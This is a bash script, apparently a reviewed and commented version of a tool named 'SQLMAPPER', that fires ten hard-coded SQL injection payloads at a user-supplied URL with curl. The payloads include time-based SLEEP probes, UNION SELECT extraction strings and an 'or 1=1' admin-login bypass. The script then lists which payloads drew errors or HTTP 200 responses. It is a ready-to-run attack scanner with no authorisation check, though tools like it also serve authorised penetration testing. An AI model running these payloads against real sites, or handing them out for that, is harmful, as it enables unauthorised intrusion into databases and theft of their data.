#!/bin/bash
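#######################################
# Print a piece of text wrapped in a terminal colour sequence, followed by
# the reset sequence "\e[0m" and a newline.
# NOTE(review): the name looks like a typo for "print_color"; it is kept
# unchanged so any existing caller still resolves.
# Arguments:
#   $1 - colour escape sequence, e.g. '\e[31m'
#   $2 - text to print
# Outputs:
#   the coloured text on stdout
#######################################
rint_color() {
  # Declared local: the original assigned plain globals named "color" and
  # "text", which leaked into (and could overwrite) the caller's variables.
  local color=$1
  local text=$2

  # echo -e expands backslash escapes in BOTH arguments, so text taken from
  # an untrusted source can inject its own terminal control sequences here.
  echo -e "${color}${text}\e[0m"
}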
#######################################
# Write the start-up banner to stdout: the braille picture, the block-letter
# tool name and the boxed author/contact details.
# Arguments: none
# Outputs:   the banner text, exactly as stored in the here-document
#######################################
display_ascii_art() {
  # The quoted delimiter makes the here-document literal, so nothing inside
  # the banner is subject to variable or command expansion.
  cat <<'BANNER'
⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠋⢀⡴⠉⠀⠀⠀⣠⠞⠁⣠⠖⠋⠁⠀⠀⣠⠞⠁⠀⠀⢸⣷⣶⣦⠀⠀⣄⠙⢦⠀⠀⠙⢆⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠋⣠⠖⠋⠀⢀⠖⣠⠊⢀⡴⠋⠁⠀⠀⢀⣤⡾⠁⠀⣠⠆⠀⣸⣟⡉⠘⣧⡀⠈⢧⠈⢧⠀⠀⠈⢣⡀⠈⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⣀⣤⣶⣩⠴⡾⠃⠀⠀⣴⠃⠀⠀⢠⠞⠀⠀⠀⠀⡠⢞⡟⠀⢀⡾⠁⡆⠀⣿⡏⠙⢦⢾⣷⡀⠈⣆⠈⢇⠰⡀⠀⠱⡀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡜⠁⠀⠀⡼⠁⠀⠀⣰⠏⠀⠀⠀⢀⡼⢁⡜⠀⢠⡟⠀⢀⠇⢀⣿⠁⠀⠀⢻⣿⣷⡄⠘⡄⠘⡆⠹⡀⠀⢹⡀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡞⠀⣠⠂⣼⠁⠀⠀⢠⠇⠀⠀⠀⠀⡞⠀⡜⠁⣴⡟⠀⠀⣼⠀⣼⡏⠀⠀⠀⠀⢻⣿⡿⠀⢱⡀⠸⡄⢳⠀⠀⢧⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⠁⢠⠃⢰⠃⠀⠀⢠⠏⠀⠀⠀⠀⡾⠀⢰⠃⢀⡟⠀⠀⢀⡏⢰⣿⠁⠀⠀⠀⠀⠀⢻⣽⡆⠈⣇⠀⢳⠘⡇⠀⠸⡄⠀⠘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢰⠃⠀⡜⠀⡜⠀⠀⢠⡏⠀⠀⣸⠁⣸⠀⠀⡟⢀⡼⠀⠀⠀⣸⠀⣼⠏⠀⠀⠀⠀⠀⠀⠀⢳⣷⠀⢹⠀⠘⡄⢱⠀⠀⠹⡀⠀⢹⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⡏⠀⢰⡇⠀⡇⠀⢠⣿⠁⠀⢰⠇⢠⠇⠀⢠⠇⣸⠃⠀⠀⢠⡇⣰⡟⠀⠀⣀⣀⠀⠀⠀⠀⠈⣿⡆⢸⡆⠀⣧⢸⡄⠀⠀⣧⡀⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⢸⠁⠀⢸⠀⠀⡇⠀⣾⡟⠀⠀⡏⠀⡞⠀⠀⢸⢀⡇⠀⠀⠀⡾⢠⣿⢃⡴⠋⠀⠘⢦⠀⠀⠀⠀⠸⣷⢸⢇⠀⢹⠘⣷⠀⠀⣿⠹⡀⢸⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⣿⠀⠀⡇⠀⠀⡇⢠⣻⠃⠀⢰⠃⢸⠁⠀⠀⢸⣿⠀⠀⠀⣰⠁⣬⠏⢸⠀⢚⣉⣡⠟⠀⠀⠀⢀⡤⣿⢠⢻⠀⢸⠀⣿⠀⠀⡏⠀⡇⢸⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⣯⠀⠀⡇⠀⠀⡇⢺⡏⠀⠀⢸⠀⡸⠀⠀⠀⣼⣿⠀⠀⢰⠏⣾⡟⠀⠘⢦⡈⠉⠁⢀⣠⣴⠞⠉⠀⢹⣼⠘⠇⢸⣴⣿⡄⠀⡇⢀⡇⢨⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⢸⡀⠀⢧⠀⢠⢷⣾⢰⠀⢀⡇⠀⡇⠀⠀⡄⢻⡇⠀⢠⠏⢠⡾⠁⠀⠀⣀⣽⣿⢿⡿⠟⠓⠒⠦⣄⢸⡿⡇⠀⣸⡿⠂⡇⠀⡇⢸⠁⣸⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢣⡀⢸⡄⣾⣟⡇⣿⠀⢸⡇⢸⡇⠀⢰⠀⢸⠃⢠⡟⢰⣿⡁⠀⠀⠾⠿⠿⠟⠋⣀⣠⣤⣤⣀⠈⣿⠻⡇⡀⡟⠛⢰⡄⢸⡇⣾⢰⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠈⢣⢸⣿⠛⣿⠁⣿⠀⢀⡇⠸⡇⠀⣼⠀⠸⣆⣾⡇⣼⡟⣷⠀⠀⠀⠀⠀⠐⠿⠿⠛⠉⠙⠛⢿⣇⣠⣧⢸⣿⠁⠀⣷⡈⣷⣇⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣾⡏⠀⠾⡀⢹⡀⠘⡇⢻⡇⠀⣿⡄⠀⣿⣿⣗⣿⢀⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣧⡟⣿⠀⠀⡟⢷⣿⣏⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡿⢳⠀⠀⢷⢸⡇⠀⠃⢸⡇⣠⣿⡇⢰⣿⣿⣿⡇⠨⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⡇⣿⣆⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠚⠀⠸⡆⠀⠀⠈⣿⠀⠀⣼⣷⣿⣿⢇⣾⣿⢿⡿⣆⣸⣿⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠁⣿⣷⣿⡿⢳⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣷⡞⣇⠀⢹⣇⣴⡿⢻⣿⣿⣾⠟⠁⠘⠇⠈⠻⢶⡠⠒⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣻⣿⣇⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⠏⠀⣿⣠⣿⣿⢿⡇⠀⠙⠋⠁⠀⠀⠀⠀⠀⠀⠂⠙⠶⠜⠊⠛⠩⠋⣉⣠⡤⠀⠀⠀⠀⣼⡿⣯⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠿⠋⠘⣿⣆⠀⠀⠀⠐⠒⢢⣤⣤⠤⠴⠒⠒⠒⠒⠒⠒⠒⠚⠉⠉⠁⠀⠀⠀⢀⣼⠏⢰⣿⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⠿⣿⣦⡀⢀⡴⣚⡵⠚⠁⠀⣀⣀⠀⢀⣀⣀⣀⠀⠀⠀⠀⠀⠀⠀⢠⣾⢿⣆⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⡟⣩⠞⠉⠀⠀⠀⠀⠈⠉⢛⣟⠛⠉⠁⠀⠀⠀⠀⠀⢀⣴⢿⣿⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢻⠟⠉⠳⣄⡀⠀⠀⠀⣠⣀⣼⣿⠀⣠⡄⠀⠀⠀⢀⣴⡟⠁⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣠⣤⣼⡇⠀⠀⠈⠻⣦⣶⣤⣿⣷⣿⣿⣶⣿⣷⣴⣿⣴⠟⠋⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⣾⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠙⠛⠿⠿⠿⠿⠿⠿⠛⠛⠛⠁⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⡏⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⡿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⣿⣿⣿⣿⢾⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡿⠁⠀⠀⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⠃⠈⠻⣧⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⢞⡆⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡋
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣟⠁⠀⠀⠀⠈⠻⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠞⠁⣾⠁⠀⢀⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣇
⠀⠀⠀⠀⠀⠀⠀⣠⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣀⠀⠀⠀⠈⠳⢦⣀⠀⠀⠀⠀⠀⠀⣠⠞⠁⠀⢰⢇⣠⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⠀⠀⠀⣀⣠⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠉⠳⠦⣤⡤⠶⠟⠁⠀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣤⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣇⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
███████ ██████ ██ ███ ███ █████ ██████ ██████ ███████ ██████
██ ██ ██ ██ ████ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██
███████ ██ ██ ██ ██ ████ ██ ███████ ██████ ██████ █████ ██████
██ ██ ▄▄ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
███████ ██████ ███████ ██ ██ ██ ██ ██ ██ ███████ ██ ██
▀▀
+-------------------------------------------------------+
| |
| SQLMAPPER - SQL injection vul scanner |
| Author: Ajansha Shankar |
| LinkedIn: Ajansha Shankar |
| GitHub: https://github.com/ajansha |
+-------------------------------------------------------+
BANNER
}
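#######################################
# Request one URL once per built-in test string and sort the strings by how
# the server answered.
#
# Each test string replaces the numeric value of the first "cat=<digits>" and
# the first "id=<digits>" found in the URL. A URL containing neither is
# requested unchanged for every entry.
#
# Classification is a heuristic, not a confirmation:
#   - HTTP 500, or the word "error" (any letter case) anywhere in the body,
#     puts the string in the "vulnerable" list;
#   - any other HTTP 200 puts it in the "possible" list.
# A page that merely prints "error", or an application that answers 200 to
# every input, is therefore reported as well; treat both lists as leads to
# verify by hand.
#
# Arguments:
#   $1 - URL to test
# Outputs:
#   progress lines and the two result lists on stdout
#######################################
check_sql_injection_vulnerability() {
  local url=$1
  # Upper bound per request so an unresponsive server cannot stall the run.
  local -r request_timeout=30
  # Both lists are local and start empty. The original never initialised
  # vulnerable_payloads and kept both as globals, so a second call (or a
  # same-named variable in the caller) carried stale entries into the report.
  local -a vulnerable_payloads=()
  local -a possible_payloads=()
  local payload sed_payload test_url response response_code response_body

  # List of payloads to test
  local -a payloads=(
    "(SELECT (CASE WHEN (8457=8457) THEN 1 ELSE (SELECT 7822 UNION SELECT 4157) END))"
    "1 AND (SELECT 3348 FROM (SELECT(SLEEP(5)))mjOo)"
    "1 UNION ALL SELECT NULL,NULL,CONCAT(0x716a6a6b71,0x4c51477945484478756a6c416556665447736e647968426673756943586e4e417441596175674c76,0x7171766a71),NULL,NULL,NULL,NULL,NULL,NULL-- -"
    "1&id=8%20AND%20(SELECT%203348%20FROM%20(SELECT(SLEEP(5)))mjOo)"
    " cat=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716a6a6b71,0x4c51477945484478756a6c416556665447736e647968426673756943586e4e417441596175674c76,0x7171766a71),NULL,NULL,NULL,NULL,NULL,NULL-- -&sub_cat=2"
    "%20cat%3D1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x716a6a6b71%2C0x4c51477945484478756a6c416556665447736e647968426673756943586e4e417441596175674c76%2C0x7171766a71%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-%26sub_cat%3D2"
    "%20id%3D13%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x716a787671%2C0x42764941656f504a6b52646c6e4445677a4e4d4c546a726e45624b6b6a49766f48426e5348726768%2C0x71786a7171%29--%20-"
    "id=8%20AND%20(SELECT%20(CASE%20WHEN%20(8457=8457)%20THEN%201%20ELSE%20(SELECT%207822%20UNION%20SELECT%204157)%20END))"
    "1234%20%27%20AND%201%3D0%20UNION%20ALL%20SELECT%20%27admin%27%2C%20%2781dc9bdb52d04dc20036dbd8313ed055"
    "admin%22%20or%201%3D1%2F%2A"
  )

  for payload in "${payloads[@]}"; do
    # The string is spliced into the replacement half of a sed s/// command,
    # where "&" means "the matched text" and "\" and "/" are special too.
    # Unescaped, every entry containing "&" produced a URL different from the
    # one the list describes, so escape those three characters first.
    sed_payload=$(printf '%s' "$payload" | sed -e 's|[\\/&]|\\&|g')
    test_url=$(printf '%s\n' "$url" \
      | sed -e "s/cat=[0-9]*/cat=${sed_payload}/" -e "s/id=[0-9]*/id=${sed_payload}/")
    echo "Testing payload: $test_url"

    # One request per string: the status code is appended on its own last
    # line, so code and body describe the same response. The original fetched
    # the URL twice and compared the code of one response with the body of
    # the other.
    response=$(curl -s --max-time "$request_timeout" -w '\n%{http_code}' "$test_url")
    response_code=${response##*$'\n'}
    response_body=${response%$'\n'*}
    echo "Response code: $response_code"

    if [[ "$response_code" == "500" || "$response_body" =~ [Ee][Rr][Rr][Oo][Rr] ]]; then
      vulnerable_payloads+=("$payload")
    elif [[ "$response_code" == "200" ]]; then
      possible_payloads+=("$payload")
    fi
  done

  if (( ${#vulnerable_payloads[@]} > 0 )); then
    echo "The following payloads are vulnerable to SQL injection:"
    for payload in "${vulnerable_payloads[@]}"; do
      echo "$payload"
    done
  else
    echo "Try possible payloads."
  fi

  if (( ${#possible_payloads[@]} > 0 )); then
    echo "________________The following payloads might be vulnerable to SQL injection:____________________"
    for payload in "${possible_payloads[@]}"; do
      echo "$payload"
    done
  fi
}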
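# Entry point: show the banner, ask for the target URL, then run the checks.
display_ascii_art

# -r keeps backslashes in the typed URL literal (plain `read` would consume
# them). An empty answer or end-of-input stops here instead of sending a
# series of requests to an empty URL.
if ! read -r -p "Enter the URL to test: " url || [[ -z "$url" ]]; then
  printf 'No URL given; nothing to test.\n' >&2
  exit 1
fi

check_sql_injection_vulnerability "$url"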